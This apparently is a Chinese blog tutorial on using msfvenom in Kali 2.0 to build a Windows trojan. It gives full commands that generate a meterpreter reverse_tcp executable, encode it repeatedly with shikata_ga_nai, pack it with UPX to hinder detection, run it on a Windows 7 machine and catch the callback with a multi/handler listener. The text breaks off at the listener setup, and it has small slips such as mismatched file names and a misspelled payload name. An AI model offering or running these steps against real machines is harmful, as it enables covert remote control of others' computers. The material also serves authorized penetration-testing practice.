摘要
在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以该博文记录一些关于msfvenom使用技巧。
msfvenom
:>>>
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.
- 目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.
- 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.
- 工具:MSF.
0x00
开启:postgresql
root@kali:~# service postgresql start
查看帮助
命令:
root# msfvenom -h
部分参数:>>>
-p 选择一个载荷[payload],或者说一个模块吧。
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-h 帮助
-f exe 生成EXE格式
LHOST,LPORT 监听上线的主机IP和端口
文件格式:>>>
不同的平台需要的不同,来看看支持生成的格式
root@kali:~# msfvenom --help-formats
Error: Executable formats
asp, aspx, aspx-exe, dll, elf, elf-so,
exe, exe-only, exe-service, exe-small, hta-psh,
loop-vbs, macho, msi, msi-nouac, osx-app, psh,
psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le,
num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
过程
2、生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数
命令:>>>
root# msfvenom -p windows/meterpreter/reverse_tcp -o
3、现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口
命令: >>>
root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe
4、upx加壳:>>>
upx -5 /root/Desktop/acn.exe
4、把生成的abc.exe放到win7下.执行.
5、在命令行下,打开msfconsole.
命令:>>>
root # msfconsole
6、本机监听,因为之前用的是reverse_tcp,所以设置如下
命令: >>>
msf > use exploit/multi/handler
Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp